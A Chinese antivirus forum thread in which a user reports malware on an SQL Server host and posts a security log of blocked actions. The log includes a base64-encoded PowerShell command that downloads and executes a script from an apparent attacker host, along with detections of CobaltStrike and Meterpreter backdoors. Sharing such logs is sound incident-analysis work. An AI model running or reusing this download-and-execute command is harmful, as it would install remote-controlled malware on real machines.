楼主: LovelyTim
收起左侧

[病毒样本] 数据库服务器病毒 8X

  [复制链接]
qzuser01
发表于 2022-6-7 11:11:42 | 显示全部楼层
是一些dll文件,不知道是放到什么目录下,
LovelyTim
 楼主| 发表于 2022-6-7 11:14:23 | 显示全部楼层
本帖最后由 LovelyTim 于 2022-6-7 11:17 编辑
火绒工程师 发表于 2022-6-7 10:59
收到,我们确认下哈

顺便把日志文件也放上来
因为是两次一样的病毒
就只放最新记录
  1. 【2】2022-06-06 16:00:15,系统防护,应用加固,sqlservr.exe触犯应用加固规则, 已阻止

  2. 防护项目:数据库
  3. 操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  4. 操作目标参数:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe/c  -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBzAHMAcQBsAC4AbABvAGEAZABlAHIAMAAxADEAOAAuAHgAeQB6ADoAMQA0ADMAMwAvAG0AcwBzAHEAbAA3AC4AdAB4AHQAJwApADsA
  5. 操作结果:已阻止

  6. 保护进程路径:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  7. 保护进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  8. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  9. 【3】2022-06-06 15:59:28,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理

  10. 病毒名称:Backdoor/CobaltStrike.l
  11. 病毒ID:976F2654168CFB4F
  12. 病毒路径:C:\Windows\Temp\TmpA0C0.tmp
  13. 操作类型:修改
  14. 操作结果:已处理

  15. 进程ID:1760
  16. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  17. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  18. 父进程:C:\Windows\System32\services.exe
  19. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  20. 【4】2022-06-06 15:59:07,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理

  21. 病毒名称:Backdoor/CobaltStrike.l
  22. 病毒ID:976F2654168CFB4F
  23. 病毒路径:C:\Windows\Temp\Tmp5157.tmp
  24. 操作类型:修改
  25. 操作结果:已处理

  26. 进程ID:1760
  27. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  28. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  29. 父进程:C:\Windows\System32\services.exe
  30. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  31. 【5】2022-06-06 15:58:50,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理

  32. 病毒名称:Backdoor/Meterpreter.ak
  33. 病毒ID:A00D08EFDA1AA78C
  34. 病毒路径:C:\Windows\Temp\TmpD48.tmp
  35. 操作类型:修改
  36. 操作结果:已处理

  37. 进程ID:1760
  38. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  39. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  40. 父进程:C:\Windows\System32\services.exe
  41. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

  42. 【6】2022-06-06 15:58:46,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理

  43. 病毒名称:Backdoor/Meterpreter.ak
  44. 病毒ID:A00D08EFDA1AA78C
  45. 病毒路径:C:\Windows\Temp\TmpFB07.tmp
  46. 操作类型:修改
  47. 操作结果:已处理

  48. 进程ID:1760
  49. 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
  50. 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
  51. 父进程:C:\Windows\System32\services.exe
  52. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
复制代码

qzuser01
发表于 2022-6-7 11:37:11 | 显示全部楼层
我看到你发了一个数据库病毒,样本实际是两个dll文件,不知道还有没有类似的主程序,
LovelyTim
 楼主| 发表于 2022-6-7 11:38:27 | 显示全部楼层
qzuser01 发表于 2022-6-7 11:37
我看到你发了一个数据库病毒,样本实际是两个dll文件,不知道还有没有类似的主程序,

已经将火绒隔离区的全部文件提取出来了
qzuser01
发表于 2022-6-7 11:52:04 | 显示全部楼层
好的,是什么原因被攻击进去的查到了吗,方便加个qq不,私信发给我 我加你!
rogersg
发表于 2022-6-7 12:03:35 | 显示全部楼层
本帖最后由 rogersg 于 2022-6-7 12:04 编辑

ESET Internet Security 清空




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
swizzer
发表于 2022-6-7 12:40:22 | 显示全部楼层
清蒸波波面 发表于 2022-6-7 11:10
智量扫描MISS,奇怪的是1分钟后文件少了4个,2分钟后剩余的4个文件消失,监控日志和系统都没有提示, ...

WD开了吗
清蒸波波面
发表于 2022-6-7 12:46:36 | 显示全部楼层

没开,禁用了。
我爱你哦123
发表于 2022-6-7 12:48:21 | 显示全部楼层
服务器开着就会被攻击放毒是吗?
pal家族
发表于 2022-6-7 15:25:58 | 显示全部楼层
短时间用貌似安装KSOS更好
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-9-25 15:17 , Processed in 0.100355 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表